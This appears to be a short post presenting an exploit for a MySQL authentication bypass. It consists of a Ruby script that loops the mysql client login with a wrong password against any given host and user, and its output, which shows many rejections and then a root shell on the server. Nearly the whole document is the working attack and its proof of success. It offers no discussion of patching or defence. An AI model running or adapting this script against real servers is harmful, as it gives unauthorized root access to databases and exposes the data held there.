MySQL authentication bypass latest exploit
#!/usr/bin/ruby #corenumb #corenumb.wordpress.com if ARGV[1] while true system("mysql -u #{ARGV[0]} mysql --password=blah -h #{ARGV[1]}") #sleep 0.1 end else puts " useage : file.rb root localhost" end
Output
corenumb@hex-VPCCW16FB:~/pentest$ ruby mysql.rb root localhost ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 8754 Server version: 5.5.22-0ubuntu1 (Ubuntu) Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql>